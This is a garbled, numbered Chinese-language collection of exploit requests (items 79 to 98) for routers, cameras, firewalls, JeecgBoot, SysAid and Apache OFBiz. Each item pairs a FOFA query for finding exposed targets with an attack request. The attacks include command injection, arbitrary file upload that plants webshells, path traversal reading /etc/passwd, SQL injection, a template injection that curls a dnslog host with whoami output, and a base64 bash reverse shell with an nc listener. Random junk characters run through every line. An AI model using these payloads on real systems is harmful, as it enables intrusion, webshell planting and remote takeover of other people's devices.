7 P0 l5 |: y/ X- P/ @' l0 {0 s
YsOxWxSvj1KyZow1PTsh98fdu6l
5 T; o' W k* i/ @7 P------YsOxWxSvj1KyZow1PTsh98fdu6l& I- V) v/ j% J# T& i! M3 h
Content-Disposition: form-data; name="target"
- E# u+ P! L+ j$ m# k! K. P- ^! d) x0 U/ n* A% Y- d
/Applications/SkillDevelopAndEHS/
$ K. Q! E% l* v8 ]/ O# D3 u- t------YsOxWxSvj1KyZow1PTsh98fdu6l--$ Z8 t& l- m+ S" N
" T$ n/ \; N: n( t4 W1 x
: ^% f. y: v i) t) i4 z, I( DGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1 N$ O$ L& F1 {: `& A8 M
Host: x.x.x.x1 ]2 u3 M4 o" X: v, T5 \. }" Y
# h; W# z+ e; [/ Z5 x( L2 H9 u6 x
79. BYTEVALUE 百为流控路由器远程命令执行3 F# @- r* i5 R; V4 r3 s& f$ n5 d1 J( ^- @
FOFA:BYTEVALUE 智能流控路由器
Q" P: o& R/ Z* hGET /goform/webRead/open/?path=|id HTTP/1.1
1 Z" `1 I0 [. o, iHost:IP
' f& L4 R1 N& ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0$ S; K/ H; _) v6 M! ~ u" C; v7 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 {9 W5 u6 C4 v& E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; I5 V. x' `# ^3 e8 w; y$ kAccept-Encoding: gzip, deflate% I1 d2 J: k8 ?0 R1 p1 Z3 |
Connection: close6 O- A8 c2 R2 {1 T. G
Upgrade-Insecure-Requests: 1
( s( i- I; o2 J5 a6 M4 z) o
1 |0 c& B# ]& l3 ~, H/ e& P. T/ S s9 R% c' C* T, s! y2 Z
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
" X8 d! t2 [% P; g7 DFOFA:app="速达软件-公司产品"
1 T; T9 F6 y. @$ `3 h3 UPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
, Z# d2 Q( { q% @8 N9 KHost: x.x.x.x$ Z# x; p9 {' |: O8 k/ e! m h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; i4 t6 J9 B7 X3 ]
Content-Length: 273 M# `1 I7 Z" f- O' J& I" ~, O! ~# I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* G; Z. d! ~ K% ^! nAccept-Encoding: gzip, deflate( u V$ I! W4 Z& E9 p+ {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ i3 A4 s# c- I4 _Connection: close% R8 M: L1 i. s0 s' ?; E8 h$ a
Content-Type: application/octet-stream. q$ w8 i5 w" H9 |9 F+ Z
Upgrade-Insecure-Requests: 1; i7 \6 q$ x# j9 }5 T) Y4 N
7 [9 Y0 x, M8 T<% out.print("oessqeonylzaf");%>
! m; e# y6 r+ o& b+ E$ y, s
& u0 z# q6 o4 w7 i) [9 R- ?) I. [, W6 s4 t& V7 t
GET /xykqmfxpoas.jsp HTTP/1.1* h& V- M, x/ N& H! u; [
Host: x.x.x.x" S# R; O6 [+ A# A( {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# w6 h) ^7 f O. zConnection: close0 i, v, B! F* g! M+ o
Accept-Encoding: gzip
+ O) y4 i) u+ d6 k) {4 _& r5 t
+ C t% n$ o6 r2 x8 j7 d: i' \# |
z6 z \% d2 ~% l& l81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露' G3 d7 d( O8 x" o& H) ^
FOFA:app="uniview-视频监控"( x- t; T8 Z- _) @
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
6 w0 p+ L0 w$ z$ h8 Z5 ]Host: x.x.x.x7 @ I) \' I# }2 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ l1 d' g& \# H. JConnection: close
( z) v! ] Z: {8 j' j5 g9 e) }Accept-Encoding: gzip
3 M' f8 A: O' L: Z& S1 J5 I
2 R5 H/ I) O( @; x7 F' g6 u: S0 Q/ X+ \1 g( l+ a+ |
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
$ M# ~4 J& D# J( k/ \FOFA:app="思福迪-LOGBASE"4 `) [$ ]/ c; A! `/ o
POST /bhost/test_qrcode_b HTTP/1.12 P6 ?/ F- F3 U1 N/ j" ?0 \
Host: BaseURL, ^2 ?# e- `* z
User-Agent: Go-http-client/1.1
$ s) Q/ V7 u" _4 ?8 QContent-Length: 23
& Q3 x4 r, L% M% m1 v& D% jAccept-Encoding: gzip
% Q( a Y+ Z4 k5 N7 QConnection: close' ?/ J* b2 I6 Z. ^1 y. C3 Q
Content-Type: application/x-www-form-urlencoded) X! @6 ]- u/ [9 S: P% r9 S
Referer: BaseURL. c' @( w0 Z/ z) C0 n0 Z
( C1 e; x; {% y7 r* q+ y+ u
z1=1&z2="|id;"&z3=bhost
, M! k2 b0 P3 ]1 U! ^: s
9 R) `8 c, K6 F# X- f( r5 K7 m3 Q8 l
83. JeecgBoot testConnection 远程命令执行" C- @2 U/ F' r
FOFA:title=="JeecgBoot 企业级低代码平台"3 d/ c a5 h3 q0 `+ X. B8 O
4 L; a6 h9 ]4 ^- J L
) p2 @! F% z3 {4 v; ~. FPOST /jmreport/testConnection HTTP/1.1. V8 j! d, z* [1 ]7 O
Host: x.x.x.x6 Y: V5 e1 X/ w4 ^+ I4 A" u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% L1 ~0 F" n9 W6 b# [1 F
Connection: close
* x! S* I) x) w" V' ?" l# \: r9 k% UContent-Length: 8881- i7 S4 B ]' y( A5 x2 J: X
Accept-Encoding: gzip
2 ~, B2 ?3 u8 b, \2 n- ?) FCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"- a+ N8 ?2 N$ p L+ N
Content-Type: application/json! N) u' K% g- j
. A) V2 T( P1 N& E: Z. h& f5 L
PAYLOAD
+ ?. Q% g8 R+ |- V3 i9 ?6 r- p n0 Y. P) p. }, }
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
1 D! P9 V1 {6 `; ?% m, Z5 ]- SFOFA:title=="JeecgBoot 企业级低代码平台"; o# g: F2 ?7 |# b5 j$ @5 h
( t7 g, m! x2 g. ]5 C9 b
6 e& [3 G: L. g$ ^8 t2 [' Q% O' n4 h1 B" ]6 f. u( s
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
! A7 p* E( L) P3 UHost: 192.168.40.130:8080. L6 q' O% v7 U6 V6 n+ Q4 s
User-Agent: curl/7.88.11 z+ ^4 U% s4 @6 j
Content-Length: 156* v% U9 O: q$ X6 X9 h4 S7 r. u' C
Accept: */*- h3 h$ B/ Z8 q4 ?/ w- H, R
Connection: close& V* U' {! Z/ D3 F: B
Content-Type: application/json
9 J) k+ O% y% sAccept-Encoding: gzip
& |! B1 h' R* x/ T0 T
( q. z7 L( x) V1 o{+ d1 G" n- }' ^, m
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",# \+ ]- {& t( ?* j9 q- v. D
"type": "0"; ?! K9 M! x3 _ Q& m' f
}0 Y5 u) `4 [% F& q, L" Z" M, U
( }4 `4 V6 R- `1 D
$ y) y* T+ X* W3 a. n! O
85. SysAid On-premise< 23.3.36远程代码执行
( H0 Q* N/ |1 J% G. MCVE-2023-47246% a) R+ x& P& k+ ]' Y' W1 E- C f
FOFA:body="sysaid-logo-dark-green.png"
. b" b0 M* x! h- U; J; E0 c$ eEXP数据包如下,注入哥斯拉马
! Z+ w% T3 l5 E" N( }POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
. S$ s3 N* |& _: G- k( T- R0 WHost: x.x.x.x
8 w. j; X9 X8 _; o- O! p; wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ h; L2 ?" I( s8 y* C4 G, i9 C
Content-Type: application/octet-stream. g' D y) y" x& Q& U/ _$ U# i7 d
Accept-Encoding: gzip
, d1 ?6 k0 x+ d7 c! y# D4 F( k7 L9 t2 L
PAYLOAD+ d& e2 u, F# w5 E- C8 G9 N
! F7 E/ }2 C. z4 `( }# K回显URL:http://x.x.x.x/userfiles/index.jsp7 n; G' V- Q1 O0 R$ v- M
$ s# k9 u& q; a2 m/ U" ~86. 日本tosei自助洗衣机RCE
: k, s( P. n$ W1 G# C$ }. NFOFA:body="tosei_login_check.php"
! \: n. d( p, E# l5 [POST /cgi-bin/network_test.php HTTP/1.1
% Y6 Y; _9 A4 r+ ^, qHost: x.x.x.x, m. |# k# V& ^ N: j. Z
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
1 Z9 \! [/ w0 r0 |* d8 MConnection: close6 P6 R: G5 M( M5 I z, q9 ^' g
Content-Length: 442 n0 G( x" N2 n9 b4 j5 h# U7 A
Accept: */*6 K4 `) u& m! ?
Accept-Encoding: gzip: A& x' D, G# K4 d; ^+ [- N% f6 V
Accept-Language: en
+ o0 K/ O. Q. y4 cContent-Type: application/x-www-form-urlencoded
, T" `# N9 i: O! O, \! s& t5 ~0 r$ L1 r
host=%0acat${IFS}/etc/passwd%0a&command=ping
; {& c1 g6 e4 F' z1 v# H u" p) Z, g; [) [4 `8 I
% c( Q0 P9 Z' C2 X& \7 Y87. 安恒明御安全网关aaa_local_web_preview文件上传. J" `- S _% M; f
FOFA:title="明御安全网关"
& W l8 f& `0 l) p% o3 e) EPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
& N! C- Y# v4 S# M! BHost: X.X.X.X% v4 R7 T( d5 i% L$ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 }& {3 U8 F( f/ P' n
Connection: close
) G. ?9 o# o% U0 pContent-Length: 198$ m! w" ~8 d' a2 _
Accept-Encoding: gzip
! _5 S9 N9 m3 yContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd' K1 d7 C! x, m; W5 e' O5 R
' D" j. b" K. \$ r$ R
--qqobiandqgawlxodfiisporjwravxtvd
. O9 G5 {! m! N* ?4 AContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
/ W- g4 U/ Y" l' } NContent-Type: text/plain6 C9 @6 K; [& [% T
" l' A( d0 n0 _7 R# k3 g3 t
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
8 V2 j4 l B: T! O/ M4 K4 S# [--qqobiandqgawlxodfiisporjwravxtvd--, {, f" Z- s8 l/ o8 W; g3 b
3 a. L" `* X" J: O0 \% j- K
- N+ S a! Y+ b. d4 k; X, b# K/jfhatuwe.php
7 [2 j3 b1 {$ Q+ N8 y
9 p* G4 {4 ]$ c. f' k2 q88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
3 L6 {& u% N& u% B& T; TFOFA:title="明御安全网关"
& N6 ^$ J) {2 K0 t c' [* ^6 CGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1+ I9 a9 z) `7 i& R5 d
Host: x.x.x.xx.x.x.x6 s7 L: E2 t4 ]' E" p; @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, p; L! T- h- P3 \; M9 z' H. YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ ]& D9 W* N& n( m3 p: e: z
Accept-Encoding: gzip, deflate- e2 X) @ Q; G; {" T9 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& ]& \6 e i7 U" e, iConnection: close
( ^" A1 t' d; B: i/ I Z
7 A+ H1 G, @# Y7 Q9 x% j' q# k& O* |
/astdfkhl.php
! b+ ~2 A4 P9 ]8 a
% ~5 H8 d3 \$ L& X89. 致远互联FE协作办公平台editflow_manager存在sql注入' `% |$ ]. ?/ h5 ^! a! d! N
FOFA:title="FE协作办公平台" || body="li_plugins_download"
6 Y; s, d5 }3 N0 ]( FPOST /sysform/003/editflow_manager.js%70 HTTP/1.1! h" M2 M4 X8 o
Host: x.x.x.x9 {8 w. n* l4 o3 F, M& {( D/ ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: T5 y3 F% M7 K' @. A$ ]
Connection: close
$ o% g4 F+ E+ m& l7 q: Z2 @Content-Length: 412 R% `( R9 Q$ q% M k, x
Content-Type: application/x-www-form-urlencoded; a& u2 H+ l6 L+ l7 B$ M9 e
Accept-Encoding: gzip
7 g" Q* \9 O! s4 C0 N. A" ]1 i9 d4 z. j( d3 r2 U ?$ d* e
option=2&GUID=-1'+union+select+111*222--+
' {2 L3 C# L- T W5 O! V7 J
1 t2 o" v$ x; x
% A) v/ D7 h1 L7 z; y90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
: ?! N+ |1 p$ E5 u) K( PFOFA:icon_hash="-1830859634") r6 d8 m5 o: ?0 z% M
POST /php/ping.php HTTP/1.1
2 a+ K, I+ o8 P0 GHost: x.x.x.x
( m( _2 h3 a/ }6 c: w1 E8 e/ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
5 F; L- N6 I) N% f6 z, p u8 k4 GContent-Length: 51
/ W! V, G$ A1 K# G1 rAccept: application/json, text/javascript, */*; q=0.01
3 x7 x+ @# }. a( c3 E8 J aAccept-Encoding: gzip, deflate6 e) A+ e3 @$ f9 x8 w# J- v) u% E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' \9 e6 ~0 R( S% c# B! b+ A
Connection: close
6 }6 S( l/ k$ j# o9 [Content-Type: application/x-www-form-urlencoded% t. m# ?; U7 g
X-Requested-With: XMLHttpRequest! ^1 ^, E9 e' o4 ~" V
: c$ q% F% X% G1 a; Djsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
2 w9 ~ g! q$ f4 g, i1 ?( G6 P; g3 n
5 B# |" V2 E; o" X2 B- d
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取& _$ C+ |: |1 T* G; B! o
FOFA:title="综合安防管理平台" u5 w5 z# V: ^
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1) m. r( p6 B5 c9 |
Host: your-ip4 u) a* ?3 p T& B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
M# h) G( O: a& w' g; ~Accept-Encoding: gzip, deflate
v8 d7 R) T" Q% q% ]; A8 eAccept: */*- C' O2 b8 Q6 A- Z. f2 n# l8 v, C3 H
Connection: keep-alive$ B6 W5 [9 m/ t) a" b0 M q
& s! ~ S& s: |) V
' K) A( C/ c( e9 \' L
. E' K+ ?8 ?& U
92. 海康威视运行管理中心session命令执行) ~& X; \+ C6 q3 f) p4 U/ A5 h
Fastjson命令执行5 `0 d1 j1 |2 b( g
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"/ h; o) Y/ g0 e- H. i0 P \
POST /center/api/session HTTP/1.1
( M. z) n% {: N, mHost:
* G( ?& K0 F, h( B# I7 t8 G8 lAccept: application/json, text/plain, */*
! E3 n& e/ N- f: J% PAccept-Encoding: gzip, deflate
. H3 A! r) R+ `4 N! f$ e5 vX-Requested-With: XMLHttpRequest9 `; h3 z9 Q: t1 }6 N3 }
Content-Type: application/json;charset=UTF-8
" o* F. Z: _. Q9 O' oX-Language-Type: zh_CN0 h2 `- Z. n ?% D( z% t
Testcmd: echo test6 s. `7 Z9 t- z9 i3 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
8 X* e7 A+ {7 E0 s5 X* BAccept-Language: zh-CN,zh;q=0.9
/ v) f7 V* E" m8 I, EContent-Length: 5778
% c% \* o+ J) v' X5 t$ i
+ r4 x( P S2 H" s" w* B$ ?PAYLOAD6 ~: g5 }/ o. V. q
0 P% w* ~/ l4 C4 X* \
% M/ H4 o; {# P93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传. K) }: [0 K4 e3 N! v0 J6 m; Y1 @
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="" C1 G+ t9 E+ S' k. w
POST /?g=app_av_import_save HTTP/1.1
* k3 K& `, p& B5 O& f- q F3 h8 XHost: x.x.x.x. E" x& n6 K: g# S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx/ ^, h5 s& B: S0 K4 g; y0 r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ F$ F+ U4 R+ r2 M0 }1 B7 K/ y, X& I5 r, K
------WebKitFormBoundarykcbkgdfx# G: e" t% K4 C. k2 ?1 ]' w
Content-Disposition: form-data; name="MAX_FILE_SIZE"& v: t: V, ?& Y( @
+ L4 P8 a) n" T: |( b1 H* P$ q
10000000
) U) e# r. d* B& n! s" M3 E% m b9 q9 a------WebKitFormBoundarykcbkgdfx2 b& M6 C; a5 \ J
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
8 Q( I; L% K8 @3 ~! `) b5 R" [Content-Type: text/plain
# ~1 K7 g3 _+ N4 o. U1 z. }& A
" V0 i* _4 l% X# n9 v# s( [wagletqrkwrddkthtulxsqrphulnknxa
. l3 V8 z! \3 X------WebKitFormBoundarykcbkgdfx
4 s: I" Z4 V! e3 C3 YContent-Disposition: form-data; name="submit_post"
@/ A, L4 _* Y0 ]/ t
) Z4 U& u1 r+ s$ k6 x1 Q) L" D8 Zobj_app_upfile
' D& E( |1 E2 J9 _* L------WebKitFormBoundarykcbkgdfx, r; K2 e, p$ ~8 e7 q) z. `
Content-Disposition: form-data; name="__hash__"0 W; v. f& G w: `' N2 h& \( F
" [6 r' Z# d. {& A& E3 N/ N d- C
0b9d6b1ab7479ab69d9f71b05e0e9445% R5 m& `/ X$ h5 b. Y; T' M+ `
------WebKitFormBoundarykcbkgdfx--! k4 e- _+ s# e
) u z3 k9 E$ c6 R/ x& }1 l0 ]4 \5 _
GET /attachements/xlskxknxa.txt HTTP/1.1
/ E4 ~. Q2 E8 | [* f6 D4 oHost: xx.xx.xx.xx
; _/ b) E! F3 DUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, I9 S& N2 I+ m9 H: t C3 x3 ?. q) t5 [& ]0 z6 }
0 U o7 s. q* {& R# |
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
7 q' ?0 y# Z mFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
' f( W, p' s3 d# Z: c' j+ w6 RPOST /?g=obj_area_import_save HTTP/1.1
, v2 M! P2 M* V8 XHost: x.x.x.x' D3 `( ]8 S$ N: I2 r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
; b% W" ^% W# yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.369 D3 e, q9 P! I5 L% A
) g7 b C/ C7 ]! I$ _% q. W# r------WebKitFormBoundarybqvzqvmt) H& r. c; H9 `9 T8 Y' y, l6 T# q: f
Content-Disposition: form-data; name="MAX_FILE_SIZE". e( t; W: E, W K9 S
x- i5 I; D- ~* C
10000000+ g! Z$ @, `/ d( K; d M' v3 g1 w
------WebKitFormBoundarybqvzqvmt
) `4 n! Q. Z4 V& X+ oContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"2 T3 t; w, s" n' T( Y6 h0 X4 S6 P
Content-Type: text/plain+ k$ M9 P' i. V7 g# \ @- l
) P& g$ [4 ^0 dpxplitttsrjnyoafavcajwkvhxindhmu) g+ |1 k. @ ?! o) S8 W" t
------WebKitFormBoundarybqvzqvmt5 C- @, N5 t: P
Content-Disposition: form-data; name="submit_post". R' m- Q1 ? a; J6 `# [7 b6 d
1 g0 z+ M; ~5 J$ K+ d
obj_app_upfile
* |" [" ~- `3 M------WebKitFormBoundarybqvzqvmt
; w+ Y$ @; {2 N: kContent-Disposition: form-data; name="__hash__"
0 ~0 j; z+ S! g- K6 }7 p
0 S/ ]( b; _! t; ^6 f0 ]0b9d6b1ab7479ab69d9f71b05e0e9445) `2 H8 J' k1 g" [) y
------WebKitFormBoundarybqvzqvmt--
+ J/ ~# |8 V$ |5 [, z' D. q- L* Z- `, m% c, S' U6 t3 g( Y
' g/ o& } z0 m' g" [
' l* B8 U5 u+ L5 A2 AGET /attachements/xlskxknxa.txt HTTP/1.16 D2 R, M" y6 d/ O
Host: xx.xx.xx.xx
% p. [* X- R0 D7 g" q* G7 M+ lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, y, d% M5 O) @/ R8 D8 \1 Y- ^
+ r2 ]3 y3 z# s1 [ l3 l
6 r, q3 g1 J# T* ~2 Z1 ?: w# z1 B( l
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行% J8 x! B0 N0 Y7 ~6 l
CVE-2023-49070+ g9 ^& v) g7 k: \/ U) `
FOFA:app="Apache_OFBiz"/ G/ o2 m( ` V/ y6 A
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1' l7 ?) a, J# a1 l" a( O# h2 E: F
Host: x.x.x.x6 o! y% ~- l: N0 I( ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36# ~# w( H" \) M$ j+ m' H H
Connection: close
* B4 Q( k* b0 h( J7 `2 \Content-Length: 889; c1 F9 L8 c) N7 e5 P6 s; V
Content-Type: application/xml
4 C! i U) r* N9 X1 ^Accept-Encoding: gzip8 @1 z( o2 U* Z; I( B
: P+ d, c* d" L0 |7 R<?xml version="1.0"?>6 N, f' n3 z, `" o; `
<methodCall>& K& [5 s8 w# ]; Z1 n
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
& l1 K2 I$ _! O& y1 n- W <params>- X1 O2 Y8 r: y9 P
<param>
) U& b2 o4 [( \, U# @) B: c R. O <value>
& W1 X' O( R3 Q0 K! r% H <struct>
' U, Y, f# U# t4 T+ `' E d <member>
* p9 x2 f% B; i) p4 [5 F* |& z <name>test</name>/ o3 Y$ t1 @8 \% |
<value>$ R& w: G% f/ D6 d* L
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>. o% @6 ?# U7 ?) N/ k
</value>6 {( g. e3 w( g, w$ G+ O
</member>& U* S `! Z6 o6 a/ p- J
</struct>
0 H) W6 s0 X/ p( x( i! r </value>
3 ?: \: U! s5 H3 P9 A$ G) x </param>
! \, _; G( T0 p </params>
+ A- q) I4 F$ p# O# Z</methodCall>; U% b# d" f# s7 P$ T( N; H
! {/ U! }- D) B6 p1 T
- v0 r0 z4 P* {# n0 `用ysoserial生成payload
8 @7 U" y1 I. y8 A0 ijava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
3 z ?3 a. n, c! A4 t H) i1 e+ x1 i8 R8 h7 [# c7 S) q4 n+ E9 g
- e2 y; F: W4 @9 P0 x将生成的payload替换到上面的POC' `8 m' Z7 F- e! W" j+ h- w$ N
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
, ^: ]3 g/ R* P( EHost: 192.168.40.130:8443
4 P0 j. f9 c6 w J# Z- v' HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ v8 L: C' U- M% i# z* r; y
Connection: close& Z9 ]1 ?6 @5 m: q
Content-Length: 889
& [* d3 S+ O5 o+ NContent-Type: application/xml
& B F2 X2 Y9 s: Z8 v5 f6 EAccept-Encoding: gzip) n& t2 s' J% r; Q" j w
. |& D# T9 u5 U- e) @/ n
PAYLOAD
( W0 L2 V- A# i3 e5 ]: B2 N+ d1 L
5 a: J$ i* N' D9 ?; i; ~. `96. Apache OFBiz 18.12.11 groovy 远程代码执行
/ r: d" b0 A( f/ k; |9 hFOFA:app="Apache_OFBiz"
5 E$ k; {" l, w; e; u) iPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
# b/ ^+ S, x2 _+ h+ S6 {0 s% y, cHost: localhost:84438 \$ U. N4 ~' {! f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 ^. s% ]6 H4 E2 ^, H( V5 U% GAccept: */*# E4 j7 n) m- G2 `- n$ j7 G0 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 o2 ~9 Z. Y c* `) M; b; l# t. G$ ^
Content-Type: application/x-www-form-urlencoded) Z/ I4 m1 {% s; g0 g6 ]
Content-Length: 55' B0 `% u5 y2 M* t
% R; F) _/ q( _3 R0 ]) ]; t' T1 ?
groovyProgram=throw+new+Exception('id'.execute().text);5 Z. |, s' l. m5 J: R
+ h3 Z6 ]- d$ d% n) U* w
1 V8 R* L8 h* }$ N c/ j反弹shell
" f1 S8 S; h' \0 n5 Y7 `0 ?在kali上启动一个监听+ o7 T5 x& T1 c4 I
nc -lvp 7777
; c* K% C# k* r$ u% a, y' M
: n* @& n9 \" D3 |# U. aPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
5 @: f; [ K, ~1 Y( k. r, ^ THost: 192.168.40.130:84433 Y( j! |2 z. c0 [# o. u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 v$ t8 O2 a2 g- \Accept: */*$ k- q G* m9 |* m6 |* `8 I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( W' k- f8 Y& \ h
Content-Type: application/x-www-form-urlencoded' z/ R$ }; ?7 [
Content-Length: 71
0 Y5 Z! X6 }6 q) {: J* g7 u2 j5 a! a- }2 n
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();& W! ^& A& u& F8 D: m1 p
( ^" X7 X, b) r: u+ Q97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行" K" T7 t9 } }2 `- R+ F7 w
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"0 @% q% F- u4 z/ _
GET /passport/login/ HTTP/1.1: w. e: u# y6 e% j
Host: 192.168.40.130:8085& P. k& @' M' d7 ?6 v2 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 E6 C! O k5 oAccept-Encoding: gzip) u+ K+ X3 W. s* X: O
Connection: close
& i1 a8 M- Y+ h& zCookie: rememberMe=PAYLOAD! l; N; E, Q/ J) x$ c- N* P2 g
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"* J0 s5 u1 s' O% Z
7 f9 a# ^/ k6 N7 m% Z1 I, ^! u& F9 _
98. SpiderFlow爬虫平台远程命令执行
/ s: t# f) ]& Q: T, HCVE-2024-0195
8 ^; j6 }4 n6 O$ k( BFOFA:app="SpiderFlow" N. m: C6 S) c( L0 ]7 R
POST /function/save HTTP/1.15 w' U; y, B1 ]' h; W
Host: 192.168.40.130:8088
